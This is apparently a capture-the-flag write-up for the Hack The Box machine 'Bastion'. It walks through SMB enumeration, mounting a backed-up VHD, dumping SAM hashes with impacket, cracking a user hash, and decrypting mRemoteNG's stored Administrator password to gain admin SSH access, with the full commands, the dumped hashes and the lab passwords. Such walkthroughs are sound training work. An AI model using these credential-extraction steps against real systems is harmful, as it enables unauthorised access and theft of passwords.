HTB - Bastion

Bastion

Getting Root:

1. Enumerate SMB and find access to Backups directory

2. Mount *.vhd file found on the backups folder and get SAM and SYSTEM files

3. Crack the hash for user and ssh to the box

4. mRemoteNG is installed in the box which stores saved session passwords using static string

5. Decrypt the stored Administrator password using a tool from GitHub

6. SSH to the box using the Administrator account

Nmap

# Nmap 7.80 scan initiated Wed Mar  4 23:29:48 2020 as: nmap -sC -sV -p- -oA nmap/Bastion 10.10.10.134    
Nmap scan report for 10.10.10.134
Host is up (0.045s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -17m43s, deviation: 34m35s, median: 2m13s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-03-05T05:33:50+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-05T04:33:46
|_  start_date: 2020-03-04T11:34:41

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar  4 23:31:40 2020 -- 1 IP address (1 host up) scanned in 112.85 seconds

Enumerating SMB

Looks like we can read IPC$, and we have READ and WRITE access to the Backups directory.

smbmap -H 10.10.10.134 -d BASTION -u 'justme'
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445	Name: 10.10.10.134                                      
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	Backups                                           	READ, WRITE	
	C$                                                	NO ACCESS	Default share
	.                                                  
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	InitShutdown
	fr--r--r--                4 Sun Dec 31 19:03:58 1600	lsass
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	ntsvcs
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	scerpc
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-2ec-0
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-1d0-0
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	epmapper
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	LSM_API_service
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	eventlog
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-370-0
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	atsvc
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-358-0
	fr--r--r--                4 Sun Dec 31 19:03:58 1600	wkssvc
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	spoolss
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	openssh-ssh-agent
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	trkwks
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	W32TIME_ALT
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	vgauth-service
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-608-0
	fr--r--r--                4 Sun Dec 31 19:03:58 1600	srvsvc
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-25c-0
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-254-0
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-5b8-0
	IPC$                                              	READ ONLY	Remote IPC

Mount the remote share

mkdir smbfiles

mount -t cifs //10.10.10.134/Backups smbfiles/
Password for root@//10.10.10.134/Backups:  # Just hit enter

root@kdeali:~/HackTheBox/Bastion# cd smbfiles/
root@kdeali:~/HackTheBox/Bastion/smbfiles# ls
etlLxkiRzT  note.txt  pmQWhHvsDA  SDT65CB.tmp  WindowsImageBackup

Interesting Files

Enumerating the Backups directory shows two .vhd files (virtual hard drives)

ls -l
total 5330560
-rwxr-xr-x 1 root root   37761024 Feb 22  2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root 5418299392 Feb 22  2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root       1186 Feb 22  2019 BackupSpecs.xml
-rwxr-xr-x 1 root root       1078 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml   
-rwxr-xr-x 1 root root       8930 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
-rwxr-xr-x 1 root root       6542 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
-rwxr-xr-x 1 root root       2894 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
-rwxr-xr-x 1 root root       1488 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
-rwxr-xr-x 1 root root       1484 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
-rwxr-xr-x 1 root root       3844 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
-rwxr-xr-x 1 root root       3988 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
-rwxr-xr-x 1 root root       7110 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
-rwxr-xr-x 1 root root    2374620 Feb 22  2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml

Mounting VHD (Virtual Hard drives)

# Make a directory to mount the VHD
mkdir vhd

# Using guestmount to mount the VHD
guestmount --v i -r -a /root/HackTheBox/Bastion/smbfiles/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd vhd/

# guestmount info and help:
guestmount: FUSE module for libguestfs
guestmount lets you mount a virtual machine filesystem
Copyright (C) 2009-2019 Red Hat Inc.
Usage:
  guestmount [--options] mountpoint
Options:
  -a|--add image       Add image
  -c|--connect uri     Specify libvirt URI for -d option
  --dir-cache-timeout  Set readdir cache timeout (default 5 sec)
  -d|--domain guest    Add disks from libvirt guest
  --echo-keys          Don't turn off echo for passphrases
  --fd=FD              Write to pipe FD when mountpoint is ready
  --format[=raw|..]    Force disk format for -a option
  --fuse-help          Display extra FUSE options
  -i|--inspector       Automatically mount filesystems
  --help               Display help message and exit
  --key selector       Specify a LUKS key
  --keys-from-stdin    Read passphrases from stdin
  --live               Connect to a live virtual machine
  -m|--mount dev[:mnt[:opts[:fstype]] Mount dev on mnt (if omitted, /)
  --no-fork            Don't daemonize
  -n|--no-sync         Don't autosync
  -o|--option opt      Pass extra option to FUSE
  --pid-file filename  Write PID to filename
  -r|--ro              Mount read-only
  --selinux            For backwards compat only, does nothing
  -v|--verbose         Verbose messages
  -V|--version         Display version and exit
  -w|--rw              Mount read-write
  -x|--trace           Trace guestfs API calls

Getting a hashdump from the image

# cd Windows/System32/config/
root@kdeali:~/HackTheBox/Bastion/vhd/Windows/System32/config# ls -la
total 74740
drwxrwxrwx 1 root root    12288 Feb 22  2019 .
drwxrwxrwx 1 root root   655360 Feb 22  2019 ..
-rwxrwxrwx 2 root root    28672 Feb 22  2019 BCD-Template
-rwxrwxrwx 2 root root    25600 Feb 22  2019 BCD-Template.LOG
-rwxrwxrwx 2 root root 30932992 Feb 22  2019 COMPONENTS
-rwxrwxrwx 2 root root  1048576 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms
-rwxrwxrwx 2 root root  1048576 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms
-rwxrwxrwx 2 root root  1048576 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms
-rwxrwxrwx 2 root root    65536 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.blf
-rwxrwxrwx 2 root root    65536 Feb 22  2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TM.blf
-rwxrwxrwx 2 root root   524288 Feb 22  2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms  
-rwxrwxrwx 2 root root   524288 Jul 14  2009 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
-rwxrwxrwx 2 root root     1024 Apr 11  2011 COMPONENTS.LOG
-rwxrwxrwx 2 root root   262144 Feb 22  2019 COMPONENTS.LOG1
-rwxrwxrwx 2 root root        0 Jul 13  2009 COMPONENTS.LOG2
-rwxrwxrwx 1 root root   262144 Feb 22  2019 DEFAULT
-rwxrwxrwx 1 root root     1024 Apr 11  2011 DEFAULT.LOG
-rwxrwxrwx 2 root root    91136 Feb 22  2019 DEFAULT.LOG1
-rwxrwxrwx 2 root root        0 Jul 13  2009 DEFAULT.LOG2
drwxrwxrwx 1 root root        0 Jul 13  2009 Journal
drwxrwxrwx 1 root root        0 Feb 22  2019 RegBack
-rwxrwxrwx 1 root root   262144 Feb 22  2019 SAM
-rwxrwxrwx 1 root root     1024 Apr 11  2011 SAM.LOG
-rwxrwxrwx 2 root root    21504 Feb 22  2019 SAM.LOG1
-rwxrwxrwx 2 root root        0 Jul 13  2009 SAM.LOG2
-rwxrwxrwx 1 root root   262144 Feb 22  2019 SECURITY
-rwxrwxrwx 1 root root     1024 Apr 11  2011 SECURITY.LOG
-rwxrwxrwx 2 root root    21504 Feb 22  2019 SECURITY.LOG1
-rwxrwxrwx 2 root root        0 Jul 13  2009 SECURITY.LOG2
-rwxrwxrwx 1 root root 24117248 Feb 22  2019 SOFTWARE
-rwxrwxrwx 1 root root     1024 Apr 11  2011 SOFTWARE.LOG
-rwxrwxrwx 2 root root   262144 Feb 22  2019 SOFTWARE.LOG1
-rwxrwxrwx 2 root root        0 Jul 13  2009 SOFTWARE.LOG2
-rwxrwxrwx 1 root root  9699328 Feb 22  2019 SYSTEM
-rwxrwxrwx 1 root root     1024 Apr 11  2011 SYSTEM.LOG
-rwxrwxrwx 2 root root   262144 Feb 22  2019 SYSTEM.LOG1
-rwxrwxrwx 2 root root        0 Jul 13  2009 SYSTEM.LOG2
drwxrwxrwx 1 root root     4096 Nov 20  2010 systemprofile
drwxrwxrwx 1 root root     4096 Feb 22  2019 TxR

# Copy the SAM and SYSTEM files to your directory

Using the impacket secresdump

We get the hashes for the user L4mpje because the Administrator hash is empty. This can be recognized by the 31d6 of the admin hash.

# impacket-secretsdump -sam SAM -system SYSTEM local
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up... 

Cracking the Hash

https://hashes.org/search.phphashes.org

I used hashes.org which is a free online password recovery tool and submitted the hash for user L4mpje and I got he following:

26112010952d963c8dc4217daec986d9:bureaulampje

Getting the User Flag

As noted on the output of the nmap results, this is a windows box but it is running ssh.

# ssh L4mpje@10.10.10.134
L4mpje@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

l4mpje@BASTION C:\Users\L4mpje>whoami                                                                                           
bastion\l4mpje                                                                                                                  

l4mpje@BASTION C:\Users\L4mpje\Desktop>dir /a                                                                                   
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of C:\Users\L4mpje\Desktop                                                                                           

22-02-2019  15:27    <DIR>          .                                                                                           
22-02-2019  15:27    <DIR>          ..                                                                                          
22-02-2019  15:26               282 desktop.ini                                                                                 
23-02-2019  09:07                32 user.txt                                                                                    
               2 File(s)            314 bytes                                                                                   
               2 Dir(s)  11.316.252.672 bytes free                                                                              

l4mpje@BASTION C:\Users\L4mpje\Desktop>  

Privilege Escalation

There is an application called mRemoteNG installed.

l4mpje@BASTION c:\Users\L4mpje\AppData\Roaming>dir /a                                                                           
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of c:\Users\L4mpje\AppData\Roaming                                                                                   

22-02-2019  14:01    <DIR>          .                                                                                           
22-02-2019  14:01    <DIR>          ..                                                                                          
22-02-2019  13:50    <DIR>          Adobe                                                                                       
22-02-2019  13:52    <DIR>          Microsoft                                                                                   
22-02-2019  14:03    <DIR>          mRemoteNG                                                                                   
               0 File(s)              0 bytes                                                                                   
               5 Dir(s)  11.315.810.304 bytes free  

Exploiting mRemoteNG

A quick google on "mRemoteNG exploit" return the following article detailing how abuse the poor encryption on this application.

mRemoteNG: Just Loaded with "Features" - Hackers VanguardHackers Vanguard

Getting the passwords from the encrypted config

I found the following tool on github. You can read the source code. It's safe

GitHub - haseebT/mRemoteNG-Decrypt: Python script to decrypt passwords stored by mRemoteNGGitHub

To run the script, you the password string which is located in the following directory:

c:\Users\L4mpje\AppData\Roaming\mRemoteNG

All you have to do is read the latest xml backup file and get the string.

l4mpje@BASTION c:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir /a                                                                 
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

# Directory of c:\Users\L4mpje\AppData\Roaming\mRemoteNG                                                                         

22-02-2019  14:03    <DIR>          .                                                                                           
22-02-2019  14:03    <DIR>          ..                                                                                          
22-02-2019  14:03             6.316 confCons.xml                                                                                
22-02-2019  14:02             6.194 confCons.xml.20190222-1402277353.backup                                                     
22-02-2019  14:02             6.206 confCons.xml.20190222-1402339071.backup                                                     
22-02-2019  14:02             6.218 confCons.xml.20190222-1402379227.backup                                                     
22-02-2019  14:02             6.231 confCons.xml.20190222-1403070644.backup                                                     
22-02-2019  14:03             6.319 confCons.xml.20190222-1403100488.backup                                                     
22-02-2019  14:03             6.318 confCons.xml.20190222-1403220026.backup                                                     
22-02-2019  14:03             6.315 confCons.xml.20190222-1403261268.backup                                                     
22-02-2019  14:03             6.316 confCons.xml.20190222-1403272831.backup                                                     
22-02-2019  14:03             6.315 confCons.xml.20190222-1403433299.backup                                                     
22-02-2019  14:03             6.316 confCons.xml.20190222-1403486580.backup                                                     
22-02-2019  14:03                51 extApps.xml                                                                                 
22-02-2019  14:03             5.217 mRemoteNG.log                                                                               
22-02-2019  14:03             2.245 pnlLayout.xml                                                                               
22-02-2019  14:01    <DIR>          Themes                                                                                      
              14 File(s)         76.577 bytes                                                                                   
               3 Dir(s)  11.315.810.304 bytes free       
               
               
# Reading the xml file and extracting the password string
4mpje@BASTION c:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml.20190222-1403486580.backup                           
<?xml version="1.0" encoding="utf-8"?>                                                                                          
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GC
M" KdfIterations="1000" FullFileEncryption="false" Protected="GZFZvMqKVfqaCb4DYaCJLOWP1D4TOix6kvJPpP9n9I3iY0wKUddxnQJSKIHscF4BXR
nHhScKnXECGoEau8Y7coTs" ConfVersion="2.6">                                                                                      
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Userna
me="Administrator" Domain="" Password="IsAizowTqaCAO6/2vMwxFtln1qfh+jZfdAI2V7Uve8JoLSRanAXzwFgMkkJbedGpCjRZbdmQIV299FlDCt8ymg=="
 Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" Rend   


# The string is encoded in base64:
Password="IsAizowTqaCAO6/2vMwxFtln1qfh+jZfdAI2V7Uve8JoLSRanAXzwFgMkkJbedGpCjRZbdmQIV299FlDCt8ymg==" 

Decrypting the Password

# ./mremoteng_decrypt.py -s IsAizowTqaCAO6/2vMwxFtln1qfh+jZfdAI2V7Uve8JoLSRanAXzwFgMkkJbedGpCjRZbdmQIV299FlDCt8ymg==  
Password: thXLHM96BeKL0ER2

Getting the Root Flag

# ssh Administrator@10.10.10.134
Administrator@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

administrator@BASTION C:\Users\Administrator>whoami                                                                             
bastion\administrator                                                                                                           

administrator@BASTION C:\Users\Administrator>cd desktop                                                                         

administrator@BASTION C:\Users\Administrator\Desktop>dir                                                                        
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of C:\Users\Administrator\Desktop                                                                                    

23-02-2019  09:40    <DIR>          .                                                                                           
23-02-2019  09:40    <DIR>          ..                                                                                          
23-02-2019  09:07                32 root.txt                                                                                    
               1 File(s)             32 bytes                                                                                   
               2 Dir(s)  11.315.679.232 bytes free                                                                              

administrator@BASTION C:\Users\Administrator\Desktop>